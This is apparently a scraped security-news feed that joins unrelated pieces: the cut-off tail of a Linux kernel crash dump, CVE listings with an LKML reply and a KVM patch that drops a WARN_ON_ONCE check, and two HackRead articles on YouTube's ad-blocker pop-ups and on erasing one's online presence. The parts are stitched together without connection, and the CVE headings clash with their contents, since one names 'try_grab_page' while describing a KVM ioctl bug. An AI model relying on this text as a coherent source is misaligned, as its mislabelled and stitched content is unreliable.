Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48  
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b4 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fc6339a4068 EFLAGS: 00000246 ORIG\_RAX: 0000000000000010  
RAX: ffffffffffffffda RBX: 000000000059c0a0 RCX: 000000000047959d  
RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000006  
RBP: 000000000059c0a0 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000000 R11: 0000000000000246 R12: 000000000059c0ac  
R13: 000000000000000b R14: 0000000000437250 R15: 00007fc633984000  
</TASK>  
Dumping ftrace buffer:  
(ftrace buffer empty)  
Kernel Offset: disabled  
Rebooting in 1 seconds..

CVE-2023-40791: LKML: Yikebaer Aizezi: WARNING in try_grab_page

** DISPUTED ** An issue was discovered in the Linux kernel through 6.5.7. kvm_arch_vcpu_ioctl_run in arch/x86/kvm/x86.c allows a WARN_ON_ONCE if userspace stuffs a nonsensical vCPU state.

Messages in this thread

*   First message in thread
*   Yikebaer Aizezi
    *   Sean Christopherson
        *   Yikebaer Aizezi

Patch in this message

*   Get diff 1

Date

Thu, 3 Aug 2023 20:46:35 +0000

Subject

Re: WARNING in kvm\_arch\_vcpu\_ioctl\_run

From

On Thu, Jul 27, 2023, Yikebaer Aizezi wrote:  
\> Hello, I'm sorry for the mistake in my previous email. I forgot to add  
\> a subject. This is my second attempt to send the message.  
\>   
\> When using Healer to fuzz the latest Linux kernel, the following crash  
\> was triggered.  
\>   
\> HEAD commit: fdf0eaf11452d72945af31804e2a1048ee1b574c (tag: v6.5-rc2)  
\>   
\> git tree: upstream  
\>   
\> console output:  
\> https://drive.google.com/file/d/1FiemC\_AWRT-6EGscpQJZNzYhXZty6BVr/view?usp=drive\_link  
\> kernel config: https://drive.google.com/file/d/1fgPLKOw7QbKzhK6ya5KUyKyFhumQgunw/view?usp=drive\_link  
\> C reproducer: https://drive.google.com/file/d/1SiLpYTZ7Du39ubgf1k1BIPlu9ZvMjiWZ/view?usp=drive\_link  
\> Syzlang reproducer:  
\> https://drive.google.com/file/d/1eWSmwvNGOlZNU-0-xsKhUgZ4WG2VLZL5/view?usp=drive\_link  
\> Similar report:  
\> https://groups.google.com/g/syzkaller-bugs/c/C2ud-S1Thh0/m/z4iI7l\_dAgAJ  
\>   
\> If you fix this issue, please add the following tag to the commit:  
\> Reported-by: Yikebaer Aizezi <yikebaer61@gmail.com>  
\>   
\> kvm: vcpu 129: requested lapic timer restore with starting count  
\> register 0x390=4241646265 (4241646265 ns) > initial count (296265111  
\> ns). Using initial count to start timer.  
\> ------------\[ cut here \]------------  
\> WARNING: CPU: 0 PID: 1977 at arch/x86/kvm/x86.c:11098  
\> kvm\_arch\_vcpu\_ioctl\_run+0x152f/0x1830 arch/x86/kvm/x86.c:11098

Well that's annoying.  The WARN is a sanity check that KVM doesn't somehow put  
the guest into an uninitialized state while emulating the guest's APIC timer, but  
I completely overlooked the fact that userspace can simply stuff the should-be-  
impossible guest state. \*sigh\*

Sadly, I think the most reasonable thing to do is to simply drop the sanity check :-(

diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c  
index 0145d844283b..e9e262b244b8 100644  
\--- a/arch/x86/kvm/x86.c  
+++ b/arch/x86/kvm/x86.c  
@@ -11091,12 +11091,17 @@ int kvm\_arch\_vcpu\_ioctl\_run(struct kvm\_vcpu \*vcpu)  
                        r = -EINTR;  
                        goto out;  
                }  
+  
                /\*  
\-                \* It should be impossible for the hypervisor timer to be in  
\-                \* use before KVM has ever run the vCPU.  
\+                \* Don't bother switching APIC timer emulation from the  
\+                \* hypervisor timer to the software timer, the only way for the  
\+                \* APIC timer to be active is if userspace stuffed vCPU state,  
\+                \* i.e. put the vCPU and into a nonsensical state.  The only  
\+                \* transition out of UNINITIALIZED (without more state stuffing  
\+                \* from userspace) is an INIT, which will reset the local APIC  
\+                \* and thus smother the timer anyways, i.e. APIC timer IRQs  
\+                \* will be dropped no matter what.  
                 \*/  
\-               WARN\_ON\_ONCE(kvm\_lapic\_hv\_timer\_in\_use(vcpu));  
\-  
                kvm\_vcpu\_srcu\_read\_unlock(vcpu);  
                kvm\_vcpu\_block(vcpu);  
                kvm\_vcpu\_srcu\_read\_lock(vcpu);

CVE-2023-40790: LKML: Sean Christopherson: Re: WARNING in kvm_arch_vcpu_ioctl_run

By Waqas
Using YouTube? You might need to disable your ad blocker or whitelist YouTube.com.
This is a post from HackRead.com Read the original post: YouTube Takes on Ad Blockers with Warning Pop-Ups

YouTube has been actively displaying pop-up warnings to users who have ad blockers installed on their browsers, urging them to disable them.

YouTube has recently started showing a pop-up message to users using ad blockers, warning them that ad blockers are not allowed on YouTube and asking them to either disable their ad blocker or subscribe to YouTube Premium.

This is a significant change for YouTube, as it has previously allowed users to use ad blockers without any restrictions. However, YouTube is facing increasing competition from other video streaming platforms, such as Netflix and Hulu, which are all ad-free. In order to remain competitive, YouTube needs to find ways to increase its revenue, and cracking down on ad blockers is one way to do that.

Screenshot of the message displayed by YouTube to encourage users to disable ad blockers on YouTube (Screenshot credit: Hackread.com)

It’s worth noting that the United States CISA (Cybersecurity and Infrastructure Security Agency) **strongly recommends** that users use ad blockers on their web browsers as a precautionary measure against ‘**malvertising**.’

The decision to show the ad blocker pop-up has been met with mixed reactions from users. Some users are frustrated that YouTube is trying to prevent them from using ad blockers, while others understand that YouTube needs to make money in order to keep operating.

It is important to note that YouTube’s terms of service do not allow users to use ad blockers. However, there are many popular ad blockers that still work on YouTube. It is possible that YouTube will continue to crack down on ad blockers in the future, but for now, users can still use them to block ads on YouTube.

****What does this mean for users?****

If you are a YouTube user who uses an ad blocker, you will now see a pop-up message when you try to watch a video. The pop-up message will give you the option to disable your ad blocker or subscribe to YouTube Premium.

If you choose to disable your ad blocker, you will be able to watch videos without seeing any ads. However, if you choose to keep your ad blocker enabled, you can only watch three videos before you are blocked from watching any more videos.

****What can users do?****

There are a few things that users can do about the YouTube ad blocker pop-up:

*   **Disable your ad blocker for YouTube.** If you don’t mind seeing ads, you can disable your ad blocker for YouTube. To do this, simply click on the ad blocker icon in your browser and select the option to disable it for YouTube.
*   **Use a different ad blocker.** There are many different ad blockers available, so if one ad blocker is not working on YouTube, you can try using another one.
*   **Subscribe to YouTube Premium.** If you want to watch videos without ads, you can subscribe to YouTube Premium. YouTube Premium also offers other benefits, such as the ability to download videos and play them in the background.
*   **Ignore the pop-up.** You can also simply ignore the pop-up and continue using YouTube with your ad blocker enabled. However, YouTube may eventually start blocking users from watching videos if they continue to use ad blockers.

****Here’s how to allow ads on YouTube videos****

Like any other website, you can add YouTube.com to your allowlist. Here’s how to do it on AdBlock, Adblock Plus, uBlock Origin, and other ad blockers:

The trend of pay-and-use services is on the rise, particularly following Elon Musk’s significant actions on Twitter (Now X). He introduced a new process for obtaining a verification badge, available to those willing to pay. Musk also restricted various features, such as 2FA, DMs, and tweet editing, to a limited user group.

Meanwhile, Facebook is **actively developing** a paid subscription service for Facebook and Instagram, which would offer users a blue checkmark for a monthly fee. It remains uncertain whether META, Facebook’s parent company, will also curtail free features for paid users or maintain the current access for all.

1.  Google may limit ad blockers for Chrome users
2.  The Pirate Bay: We mine Monero from your CPU, install Adblocker or leave
3.  Clones of popular Ad blockers caught ad frauding millions of Chrome users

YouTube Takes on Ad Blockers with Warning Pop-Ups

By Owais Sultan
Believe it or not, the internet is now over half a century old. Of course, it has really…
This is a post from HackRead.com Read the original post: Is It Possible to Delete Yourself From the Internet Altogether?

Believe it or not, the internet is now over half a century old. Of course, it has really come in leaps and bounds in the last few decades, with **technological advances** and innovations making global communication easier than ever.

The explosion of apps, social media platforms and e-commerce portals that this has instigated has encouraged us to part with more and more of our personal information… but it appears that we may have finally reached a tipping point in this regard. In **a recent survey**, over 80% of respondents said they were concerned about how their online data is used by others.

For that reason, an increasing number of internet users are contemplating extricating themselves from the World Wide Web altogether. But is such a thing even possible? We’ll investigate the topic in greater detail below.

****Can you delete yourself from the internet?****

Technically speaking, it’s not possible to remove all traces of yourself and your online activity from the internet with 100% certainty. That’s because most people have been interacting with the net on a daily basis for many years and over this time, they have created an extensive digital footprint which it’s extremely challenging to eradicate.

Having said that, there are plenty of steps you can take to reduce your online exposure and limit the amount of personal information that is shared with others online. This will reduce the likelihood of unwanted outcomes, such as spam messages, unsolicited robocalls and targeted ads, as well as more concerning eventualities such as fraud, identity theft and scams.

****How can I remove existing traces of personal information?****

Every time you’ve ever interacted with a website, app or digital service provider – and that includes everything from making an e-commerce purchase to signing up for an email newsletter to posting content on social media platforms – you’ve (perhaps inadvertently, perhaps intentionally) shared information about yourself with the world. 

To start, you can **remove your personal info from Google Search** and then go through other steps such as opting out of data brokerage agreements, contacting individual service providers to request the removal of your data and deleting any old or obsolete accounts that you no longer use. This can take a significant investment of time and effort, though there are third-party companies which will lend you their expertise for a nominal fee.

****Is it possible to use the internet anonymously in the future?****

So now that you’ve cleaned up your online presence as best as possible, can you continue using the internet without leaving further footprints? Yes and no. While your online activity can always be logged in some regard, you can alter your approach to minimize the amount of personal information you leave behind going forward.

This will involve such steps as installing and activating a **VPN** on your device to mask its location and encrypt all information sent using it, as well as refraining from logging on to public Wi-Fi networks and using browsers which offer greater protection. You can also tweak the privacy settings on your accounts to maintain control of your data more comprehensively.

Given the nature of the beast, it’s all but impossible to remove yourself from the internet altogether. However, with an investment of time, effort and perhaps money, you can reduce your online presence quite substantially.

1.  What Are Dark Web Search Engines and How to Find Them?
2.  The Types of Phishing Attacks and How to Dodge All of Them
3.  How to Obtain a Virtual Phone Number and Why You Need One

Tag

#google